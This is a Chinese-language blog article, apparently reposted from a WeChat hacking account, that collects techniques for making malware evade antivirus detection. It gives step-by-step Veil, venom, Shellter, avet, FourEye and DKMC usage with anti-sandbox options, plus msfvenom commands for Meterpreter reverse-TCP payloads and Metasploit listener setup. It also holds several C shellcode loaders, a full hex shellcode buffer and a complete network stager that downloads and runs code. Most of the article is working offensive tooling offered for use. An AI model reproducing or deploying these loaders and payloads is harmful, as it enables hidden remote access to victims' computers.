|
免杀知识汇总 (qq.com)
免杀知识汇总网络安全编程与黑客程序员 4天前
文章作者:系统安全运维
目录:
一、杀软常见的三种方式
二、免杀的三种常用方式
三、利用工具实现免杀
1、veil工具基础实现免杀+进阶
2、venom免杀
3、利用kali自带的shellter进行免杀
4、利用avet实现免杀
四、利用源码编译+加载器加载代码实现免杀
1)方式一,cs+c语言代码组合拳
2)方式二,msf+c语言源代码
五、FourEye免杀
六、DKMC免杀
七、思维导图
一、杀软常见的三种方式
静态查杀(邮件类查杀一般是静态的)-->一般根据特征码识别到-->对文件进行特征匹配的思路
云查杀
行为查杀(也可以理解为动态查杀)-->对其产生的行为进行检测
3.1 可构建行为库进行动态查杀
3.2 可构建日志库对日志库进行动态查杀
3.3 统计学检测-->构建特征学习模型-->进行动态查获取就好了
二、免杀的三种常用方式
①捆绑-->文件捆绑,自解压捆绑,如exe类型的
②特征码混淆思路-->即混淆特征码进而绕过免杀
三种方式:
2.1 代码混淆
2.2 api钩子(函数混淆类)-->典型dll劫持类型-->即伪造一个dll文件,然后在调用dll文件的时候,先调用伪造的dll文件,在调用真实的dll文件,进而实现处理木马的操作。
2.3 溢出类型漏洞特点类
③白名单-->原理:杀毒软件对自己旗下的软件不检测导致
三、利用工具实现免杀1,veil工具基础实现免杀+进阶①启动方法
- cd /opt
- ls
- veil(运行veil即可)
复制代码 使用方法
如 生成go语言的免杀马
- use 1
- list
- use 16
- set lhost ip
- set lport 端口
- generate#(执行即可)
复制代码 监听–>利用msf进行监听即可
- use exploit/multi/handler#选择监听模块类
- msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
- msf5 exploit(multi/handler) > set lport 3334
- msf5 exploit(multi/handler) > set lport 10.211.55.2
- msf5 exploit(multi/handler) > exploit
复制代码 ②结合cs进行免杀
实操(生成go语言的免杀马)
1)、cs使用生成一个go语言类型的payload
2)、
use1
use 17
3)需要的设置变量类(具体参数设置的含义)
- BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试)
- CLICKTRACK 设置为4表示 表示需要4次点击才会执行
- CURSORCHECK 设置为100表示 运行环境的硬盘大小如果大于100GB才会执行payload (反沙箱)
- COMPILE_TO_EXE 设置为Y表示 编译为exe文件
- HOSTNAME 设置为Comp1表示 只有在Hostname计算机名为Comp1时才会执行payload(指定目标环境 反沙箱的方式)
- INJECT_METHOD 可设置为Virtual 或 Heap
- MINPROCS 设置为20表示 只有运行环境的运行进程数大于20时才会执行payload(指定目标环境 反沙箱的方式)
- PROCCHECK 设置为Y表示 只有运行环境的进程中没有虚拟机进程时才会执行payload(指定目标环境 反沙箱的方式)
- PROCESSORS 设置为2表示 只在至少2核的机器中才会执行payload(指定目标环境 反沙箱的方式)
- RAMCHECK 设置为Y表示 只在运行环境的内存为3G以上时才会执行payload(指定目标环境 反沙箱的方式)
- SLEEP 设置为10表示 休眠10秒 以检测是否运行过程中被加速(反沙箱)
- USERNAME 设置为Tom表示 只有在当前用户名为Tom的机器中才执行payload。
- USERPROMPT 设置为Y表示 在injection之前提醒用户(提示一个错误框,让用户误以为该程序执行错误才无法打开)
- DEBUGGER 设置为Y表示 当被调试器不被attached时才会执行payload (反调试)
- DOMAIN 设置为Comp表示 受害者计算机只有加入Comp域中时,才会执行payload(指定目标环境 反沙箱的方式)
- UTCCHECK 设置为Y表示 只在运行环境的系统使用UTC时间时,才会执行payload
复制代码 4)设置
- set USERNAME lll#前三个均表示在该特定的情况下执行这个木马
- set HOSTNAME win7
- set UTCcheck TRUE
- set UTCcheck TRUE
- generate#(即代表设置完成的含义状况特点)
复制代码
5)然后选择3,即自定义字符串的含义
输入cs生成的字符串即可
6)设置名字
即可完成组合拳
③结合mingw-w64
生成payload后
利用mingw-w64进行编译进行实现免杀的作用
gcc -o c.exe c.c -l ws2_32#即过滤掉该命令的状况思路
2,venom免杀打开方法
./venom.sh
windows下的基础免杀
命令步骤
- 2
- 4
- #输入ip,输入端口
- #选择常规的
- windows/meterperter/reverse_tcp
- #输入文件名
- #后面均选默认即可
复制代码 3,利用kali自带的shellter进行免杀
基础生成命令
- 选择A#(即自动模式)
- 选择注入的程序
- 选择是否要用隐身模式(建议不使用,免杀效果会变差)
- 选择自定义字符还是自动字符
- 选择模块#一般是选择1模块
- 设置ip,设置端口
复制代码 监听方法
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp(监听方法)
4、利用avet实现免杀运行
- #进入其的目录
- #然后 python 其py程序即可
复制代码 一般是直接选择2生成一个payload
四、利用源码编译+加载器加载代码实现免杀方式一
cs+c语言代码组合拳
可参考:https://blog.csdn.net/qq_33942040/article/details/106463360
方式二,msf+c语言源代码
思路和cs实现免杀的思路差不多,利用编译进行绕过实现的
①首先现在msf中生成shellcode
c语言代码1
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f c -o shell.c
②在c语言代码的buf[]=中添加该shell然后进行编译即可
- unsigned char buf[] =
- "shellcode";
- #pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口
- main()
- {
- ( (void(*)(void))&buf)();
- }
复制代码 c语言代码2
免杀生成出现问题- #include <Windows.h>
- #include <stdio.h>
- #include <string.h>
- #pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口
- unsigned char buf[] =
- "shellcode";
- main()
- {
- char *Memory;
- Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- memcpy(Memory, buf, sizeof(buf));
- ((void(*)())Memory)();
- }
复制代码
- #include<windows.h>
- #include<stdio.h>
- unsigned char buf[] =
- "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
- "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
- "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
- "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
- "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
- "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
- "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
- "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
- "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
- "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
- "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
- "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2b\x99"
- "\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
- "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
- "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
- "\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
- "\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
- "\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
- "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
- "\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
- "\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
- "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
- "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
- size_t size = sizeof(buf);
- int main()
- {
- char *inject;
- inject = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- //分配可读可写可执行
- memcpy(inject, buf, size);//复制大小进去
- ((void(*)())inject)();//执行
- }
复制代码 c语言代码3
- #include <windows.h>
- #include <stdio.h>
- #pragma comment(linker, "/section:.data,RWE")
- unsigned char shellcode[] ="";
- void main()
- {
- __asm
- {
- mov eax, offset shellcode
- jmp eax
- }
- }
复制代码 c语言代码4
- #include <windows.h>
- #include <stdio.h>
- unsigned char buf[] ="";
- void main()
- {
- ((void(WINAPI*)(void))&buf)();
- }
复制代码 c语言代码5(汇编花指令)
注意:生成的exe文件需要环境中有几个.dll文件才可运行
- #include <windows.h>
- #include <stdio.h>
- #pragma comment(linker, "/section:.data,RWE")
- unsigned char shellcode[] ="";
- void main()
- {
- __asm
- {
- mov eax, offset shellcode
- _emit 0xFF
- _emit 0xE0
- }
- }
复制代码 c语言代码6
base4.c代码
- /* Base64 encoder/decoder. Originally Apache file ap_base64.c
- */
- #include <string.h>
- #include "base64.h"
- /* aaaack but it's fast and const should make it shared text page. */
- static const unsigned char pr2six[256] =
- {
- /* ASCII table */
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
- 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
- 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
- 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
- 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
- 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
- 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
- };
- int Base64decode_len(const char *bufcoded)
- {
- int nbytesdecoded;
- register const unsigned char *bufin;
- register int nprbytes;
- bufin = (const unsigned char *)bufcoded;
- while (pr2six[*(bufin++)] <= 63);
- nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;
- nbytesdecoded = ((nprbytes + 3) / 4) * 3;
- return nbytesdecoded + 1;
- }
- int Base64decode(char *bufplain, const char *bufcoded)
- {
- int nbytesdecoded;
- register const unsigned char *bufin;
- register unsigned char *bufout;
- register int nprbytes;
- bufin = (const unsigned char *)bufcoded;
- while (pr2six[*(bufin++)] <= 63);
- nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;
- nbytesdecoded = ((nprbytes + 3) / 4) * 3;
- bufout = (unsigned char *)bufplain;
- bufin = (const unsigned char *)bufcoded;
- while (nprbytes > 4) {
- *(bufout++) =
- (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
- *(bufout++) =
- (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
- *(bufout++) =
- (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
- bufin += 4;
- nprbytes -= 4;
- }
- /* Note: (nprbytes == 1) would be an error, so just ingore that case */
- if (nprbytes > 1) {
- *(bufout++) =
- (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
- }
- if (nprbytes > 2) {
- *(bufout++) =
- (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
- }
- if (nprbytes > 3) {
- *(bufout++) =
- (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
- }
- *(bufout++) = '\0';
- nbytesdecoded -= (4 - nprbytes) & 3;
- return nbytesdecoded;
- }
- static const char basis_64[] =
- "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
- int Base64encode_len(int len)
- {
- return ((len + 2) / 3 * 4) + 1;
- }
- int Base64encode(char *encoded, const char *string, int len)
- {
- int i;
- char *p;
- p = encoded;
- for (i = 0; i < len - 2; i += 3) {
- *p++ = basis_64[(string[i] >> 2) & 0x3F];
- *p++ = basis_64[((string[i] & 0x3) << 4) |
- ((int)(string[i + 1] & 0xF0) >> 4)];
- *p++ = basis_64[((string[i + 1] & 0xF) << 2) |
- ((int)(string[i + 2] & 0xC0) >> 6)];
- *p++ = basis_64[string[i + 2] & 0x3F];
- }
- if (i < len) {
- *p++ = basis_64[(string[i] >> 2) & 0x3F];
- if (i == (len - 1)) {
- *p++ = basis_64[((string[i] & 0x3) << 4)];
- // *p++ = '=';
- }
- else {
- *p++ = basis_64[((string[i] & 0x3) << 4) |
- ((int)(string[i + 1] & 0xF0) >> 4)];
- *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
- }
- //*p++ = '=';
- }
- *p++ = '\0';
- return p - encoded;
- }
复制代码 base64.h代码
- #ifndef _BASE64_H_
- #define _BASE64_H_
- #ifdef __cplusplus
- extern "C" {
- #endif
- int Base64encode_len(int len);
- int Base64encode(char * coded_dst, const char *plain_src, int len_plain_src);
- int Base64decode_len(const char * coded_src);
- int Base64decode(char * plain_dst, const char *coded_src);
- #ifdef __cplusplus
- }
- #endif
- #endif //_BASE64_H_
- shellcode.c
- #include <Windows.h>
- #include <stdio.h>
- #include <string.h>
- #include "base64.h"
- unsigned char buf[] =
- "msf base64 code here";
- int main(int argc, const char * argv[]) {
- char str1[1000] = { 0 };
- Base64decode(str1, buf);
- //printf("%d ", sizeof(str3));
- char *Memory;
- Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- memcpy(Memory, str1, sizeof(str1));
- ((void(*)())Memory)();
- return 0;
- }
复制代码 msf生成base64的shellcode
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=10.211.55.2 lport=3333 -f c > shell.c
gcc编码
gcc shellcode.c base64.c -o test.exe
③进行监听
- use multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST 10.211.55.2
- set LPORT 3333
- set EnableStageEncoding true
复制代码 五、FourEye免杀kali环境下使用
直接使用即可
python3 BypassFramework.py
加载器方法1.使用shellcode_launcher①生成raw格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw
②
shellcode_launcher执行产生exe文件
- shellcode_launcher.exe -i shellcode.raw
- #1
复制代码 六、DKMC免杀- [*] (gen) 将msf的shellcode注入到一个BMP图像
- [*] (web) 启动web服务用来分发BMP图像
- [*] (ps) 生成ps的payload
- [*] (sc) 将msf生成的raw文件转为shellcode
- [*] (exit) 退出
复制代码 生成步骤与原理
- 先利用msf生成raw文件
- 利用sc讲raw文件转换为shellcode
- 利用gen将上一步的shellcode注入到一个BMP图像
- 利用ps生成基于powershell的BMP文件的payload
- 用web提供的简单web服务进行分发BMP文件
- https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg
复制代码- 详细参考教程:
- https://www.freebuf.com/articles/system/227463.html
- https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html
复制代码 七、思维导图
meta64位过杀软
过32位
- /*
- * A C-based stager client compat with the Metasploit Framework
- * based on a discussion on the Metasploit Framework mailing list
- *
- * @作者 Raphael Mudge (raffi@strategiccyber.com)
- * @license BSD License.
- *
- * Relevant messages:
- * * http://mail.metasploit.com/pipermail/framework/2012-9月/008660.html
- * * http://mail.metasploit.com/pipermail/framework/2012-9月/008664.html
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <windows.h>
- #include <winsock2.h>
- /* init winsock */
- void winsock_init() {
- WSADATA wsaData;
- WORD wVersionRequested;
- wVersionRequested = MAKEWORD(2, 2);
- if (WSAStartup(wVersionRequested, &wsaData) < 0) {
- printf("ws2_32.dll is out of date.\n");
- WSACleanup();
- exit(1);
- }
- }
- /* a quick routine to quit and report why we quit */
- void punt(SOCKET my_socket, char * error) {
- printf("Bad things: %s\n", error);
- closesocket(my_socket);
- WSACleanup();
- exit(1);
- }
- /* attempt to receive all of the requested data from the socket */
- int recv_all(SOCKET my_socket, void * buffer, int len) {
- int tret = 0;
- int nret = 0;
- void * startb = buffer;
- while (tret < len) {
- nret = recv(my_socket, (char *)startb, len - tret, 0);
- startb += nret;
- tret += nret;
- if (nret == SOCKET_ERROR)
- punt(my_socket, "Could not receive data");
- }
- return tret;
- }
- /* establish a connection to a host:port */
- SOCKET wsconnect(char * targetip, int port) {
- struct hostent * target;
- struct sockaddr_in sock;
- SOCKET my_socket;
- /* setup our socket */
- my_socket = socket(AF_INET, SOCK_STREAM, 0);
- if (my_socket == INVALID_SOCKET)
- punt(my_socket, "Could not initialize socket");
- /* resolve our target */
- target = gethostbyname(targetip);
- if (target == NULL)
- punt(my_socket, "Could not resolve target");
- /* copy our target information into the sock */
- memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
- sock.sin_family = AF_INET;
- sock.sin_port = htons(port);
- /* attempt to connect */
- if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
- punt(my_socket, "Could not connect to target");
- return my_socket;
- }
- int main(int argc, char * argv[]) {
- ULONG32 size;
- char * buffer;
- void (*function)();
- winsock_init();
- if (argc != 3) {
- printf("%s [host] [port]\n", argv[0]);
- exit(1);
- }
- /* connect to the handler */
- SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));
- /* read the 4-byte length */
- int count = recv(my_socket, (char *)&size, 4, 0);
- if (count != 4 || size <= 0)
- punt(my_socket, "read a strange or incomplete length value\n");
- /* allocate a RWX buffer */
- buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (buffer == NULL)
- punt(my_socket, "could not allocate buffer\n");
- /* prepend a little assembly to move our SOCKET value to the EDI register
- thanks mihi for pointing this out
- BF 78 56 34 12 => mov edi, 0x12345678 */
- buffer[0] = 0xBF;
- /* copy the value of our socket to the buffer */
- memcpy(buffer + 1, &my_socket, 4);
- /* read bytes into the buffer */
- count = recv_all(my_socket, buffer + 5, size);
- /* cast our buffer as a function and call it */
- function = (void (*)())buffer;
- function();
- return 0;
- }
复制代码 版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权,烦请告知,我们会立即删除并致歉!
网络安全编程与黑客程序员
网络安全编程与黑客程序员技术社区,记录网络安全与黑客技术中优秀的内容,传播网络安全与黑客技术文化,分享典型网络安全知识和案例!未知攻,焉知防。攻防兼顾,方知安全!程序员改变世界!
255篇原创内容
公众号
|
|